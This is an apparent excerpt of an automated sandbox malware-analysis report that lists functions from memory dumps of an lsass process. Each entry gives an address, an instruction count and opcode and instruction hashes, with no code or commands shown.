                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction ID: 712c9a87abc59480b90db644c00259f4adf89bffa35cc7a9c29fdbe9e0f719ee
                                                            • Opcode Fuzzy Hash: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction Fuzzy Hash: 33118B35A0E68D8FE713DB6888B10AD7BB0EF53310F1541B6C144DB192DE7CA64AAB81
                                                            Function 00007FFD348B0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction ID: c0f9a6284258d6d90449cdae7da6f3e2ed25fd9b212614c2871a2d786d00d2e9
                                                            • Opcode Fuzzy Hash: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction Fuzzy Hash: 52017C34E0E2899FEB12DB6888A409D7FB0EF03300F1441F6D544DB192DE7CAA459781
                                                            Function 00007FFD348C4AB0 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction ID: cd8c31561687749dfeb71958535db18c8a0aae71e62d107a303cf27dbe4cb50d
                                                            • Opcode Fuzzy Hash: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction Fuzzy Hash: 05F05430B1C90B4FF6199B0C99E06B97291EF56710F508172D61FC31D6ED3CED816688
                                                            Function 00007FFD348C42D9 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: edafc2428d5ccee991aa8cb766393cbd882c016104ed16d42629e59fce8562f8
                                                            • Instruction ID: 6fe98d940d13bd9ae512aec80ab750dda71e55776894a947132842e5c6f961db
                                                            • Opcode Fuzzy Hash: edafc2428d5ccee991aa8cb766393cbd882c016104ed16d42629e59fce8562f8
                                                            • Instruction Fuzzy Hash: A5F08131B0840E8BF710DB84C8A49BEB7A1EF51710F00063BC11AD7289CEBC69818680
                                                            Function 00007FFD348B4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: ccede96e88bc7e0a21b6ca1f725839310230ca55dd1c7de19ccbd3975723da9f
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 64F0EC30A1CA1E8EFB55EB40C8E57F87361FB97701F5041B5C60AD72A5DFAC69809A81
                                                            Function 00007FFD348EAC89 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b47bbe3ce6633e90240de428528b7ac5aaf74c28822c1bd52b82399c0ad5532
                                                            • Instruction ID: c13fa1bfb10e7f214b80c502d694a0a2c5ee59307ff9919afa7c0cdb93b14e04
                                                            • Opcode Fuzzy Hash: 1b47bbe3ce6633e90240de428528b7ac5aaf74c28822c1bd52b82399c0ad5532
                                                            • Instruction Fuzzy Hash: C2F02B2175DBC40FC719663954654A17BE1CF9B20574942FFD097C7693DD18EC468341
                                                            Function 00007FFD348B45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 303be9dbd397d72052ab4426d3bdc686c0a49139f0a662adfa975f5fce6681dd
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: BBF05E30B0CA0A4EFB90EB00C8E57F82391FF57700F108175CA4ED72A2DEAC69409AC0
                                                            Function 00007FFD348DCB99 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction ID: 989b8fce73b684103055b26c55621fc25bf41651d12cf89ef1dfb12e57f0f706
                                                            • Opcode Fuzzy Hash: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction Fuzzy Hash: 25F06D6096D7C44FC302AB388C640247FF0EE5B20578A02EBC0C5CA5B3EA198946C352
                                                            Function 00007FFD348E2E99 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d8e67cd949d173e3fd3b7862f4b1429d18864530a71535e5ab37102f3f98f2
                                                            • Instruction ID: 9b2d419dad0e0b03a481a11f2af2f04ad6c0e486dd6a37c60adb0af31268653e
                                                            • Opcode Fuzzy Hash: 49d8e67cd949d173e3fd3b7862f4b1429d18864530a71535e5ab37102f3f98f2
                                                            • Instruction Fuzzy Hash: 1CE01220719B884FC70E662C8C695647FB1EFAB61178952DBC045CB6A3ED19DC89C741
                                                            Function 00007FFD348CA78B Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348c0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa2a81ab90c76cea9b7e3a81290d88cad7a08fdbb9687a4b825017d060acf1a
                                                            • Instruction ID: 3e29427421c4495a2cbfc7a32c9b7014251b3aa6d64c3563834ae623f6b807fc
                                                            • Opcode Fuzzy Hash: dfa2a81ab90c76cea9b7e3a81290d88cad7a08fdbb9687a4b825017d060acf1a
                                                            • Instruction Fuzzy Hash: 79F01221B199194FEAD4EB5884B5678A2D2FF59300F1405B6D50DD7282CD39BC419B40
                                                            Function 00007FFD348E8169 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e8679f45554cb8bd0e426df1b9886b9dc8db377811cae7693e09ea5c39d4e2b
                                                            • Instruction ID: d63cf363b2eafce00b12b42001ee354a251c089acef09358249d922c982968db
                                                            • Opcode Fuzzy Hash: 0e8679f45554cb8bd0e426df1b9886b9dc8db377811cae7693e09ea5c39d4e2b
                                                            • Instruction Fuzzy Hash: 08E04F2164A7C44FC70EA7288C695603BB1DE6B21178A40D7C045CB6B3E91ECC49C741
                                                            Function 00007FFD348B06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction ID: 0e1ac431929f476acabd6338b9bf160cda12f825b496f6581b6df297c8901bf1
                                                            • Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction Fuzzy Hash: F7E0DF01E4E78A0EE60322BD14F60AD7A141F93214F9801B2C64DD60A3BCCE309826A2
                                                            Function 00007FFD348D9619 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348d3000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction ID: 656970dfed9a4d588b913da2e8751fd6ed58901285d9920c190bdbcfc391a764
                                                            • Opcode Fuzzy Hash: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction Fuzzy Hash: 25E0862164A7C44FC70EA7788C699503FB1DF6B21178A40DBC045CB6B3E91DCC49C752
                                                            Function 00007FFD348B2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: ad0b291874e62b9b7d13df6e15b7efe3e4b269c6aba3380eaa1ab2a98312651c
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: A9E01260F0D4064AFB94A744D4A17A96255DB4A310F140078DB4ED33C1CD6CAD409B86
                                                            Function 00007FFD348E7CD9 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14685c2a076262b805058f1ff0bb1896821295ce047a7273c85fb52a63930c45
                                                            • Instruction ID: fcbe995f45cf3f4f40755ec17933731352bfb013a4ede62fa242e71a8210e5f5
                                                            • Opcode Fuzzy Hash: 14685c2a076262b805058f1ff0bb1896821295ce047a7273c85fb52a63930c45
                                                            • Instruction Fuzzy Hash: B3E01A3194F7C04FC74B973588A88547F61EE1721474A40EAC145CF1A3DA1A8949C701
                                                            Function 00007FFD348E92F9 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9c8b8bf189b189452d69569c7ef9fd885a058188383caafd4e1b9b1143e2f95
                                                            • Instruction ID: eb2a3ab983c84e23d8e464ff0ba941a903abc57a88c6d3c78fa867b806bc547c
                                                            • Opcode Fuzzy Hash: a9c8b8bf189b189452d69569c7ef9fd885a058188383caafd4e1b9b1143e2f95
                                                            • Instruction Fuzzy Hash: 32E0E23195E7C44FC70BAB3488A99503FB0AE2B21178B01CBD045CF5B3EA698C88C762
                                                            Function 00007FFD348B0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction ID: a72dcec10c68db10ea45f213d187928fe39dfa7d4f5fd9b240b871a8dc6b700b
                                                            • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                            • Instruction Fuzzy Hash: B8D0A730218A4E4FD600B738C88A4247BA0FF0F211FD510E1E008C71A2D50848558740
                                                            Function 00007FFD348E1C60 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD348E7238 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction ID: e699609c198188c136d0c9e7fc6b140a4b29c04be5d0b62b483b38538d98cef3
                                                            • Opcode Fuzzy Hash: fe6b07c59252034134d45c01d9cb1620296feb28c577bcd899787bddbc10cddb
                                                            • Instruction Fuzzy Hash: 0DD01234B549044F870CA7399C9987473D1EB6A61679540A9D40BC72B1D96ADCC9C741
                                                            Function 00007FFD348EBAE8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348E1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348e1000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction ID: 08962eaa666a1472b1539e901440cdc9defa26c39a5e404182015b54de2e2b5c
                                                            • Opcode Fuzzy Hash: 0e30a70fdf3be1c2062e9d2c23b2e8354167320d4b8d6ed77101f0ce33f1e901
                                                            • Instruction Fuzzy Hash: FFD01234B509054F871CA73888A987473D1EBAA21679544A9D00AC72B1E96ADC89C741
                                                            Function 00007FFD348B06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 9e861f3e439aaf853c8f11a22adbb079205d10f98cd7a304199f1e10a4677264
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 60C04C05F5E61F09B815776E58E60ACA1409BD7610FD50172D74DD00D19CCD24D921D6
                                                            Function 00007FFD348B12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 386651720350b0619f7d7d9a3cfaa5a0b8af7bb539c6fe2dbe72a98b27a909b0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 7BC04C345518099FC948EB29C89595477A0FB1A315BD50094E409C7171D65AECD5D781
                                                            Function 00007FFD348B4C37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29b6c8e7a83b95acbc3b1db65da8dc0763b59cff095b481416aa6b3370ee7f49
                                                            • Instruction ID: 559f025f8c902d0494627f3ab13a702a4e5e92ce54ab8853d81f1ed1c6bd25de
                                                            • Opcode Fuzzy Hash: 29b6c8e7a83b95acbc3b1db65da8dc0763b59cff095b481416aa6b3370ee7f49
                                                            • Instruction Fuzzy Hash: 42C08C00F0CC1646F2A4228400312BE04064F88300F944030E10EEB3C6CE6C2D0112C6
                                                            Function 00007FFD348B06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: a84eed44f54335c228166c2b680a71cf7003e3d9a047fb829d510b8d8adaef60
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: 23B01200E5A40F08A404337E08D20A470405B47100FC000B0D60EC00819CCD249422C2
                                                            Function 00007FFD348B1FF7 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.3209158412.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 46483bb4b5e4ee59b5de81c9b5a2aa8061e20f852aa1730399efe1ce38cac06f
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 90C02B30F0C40C44E734433048520FB32014F47304F0542F1810BFB082CC3C1C003180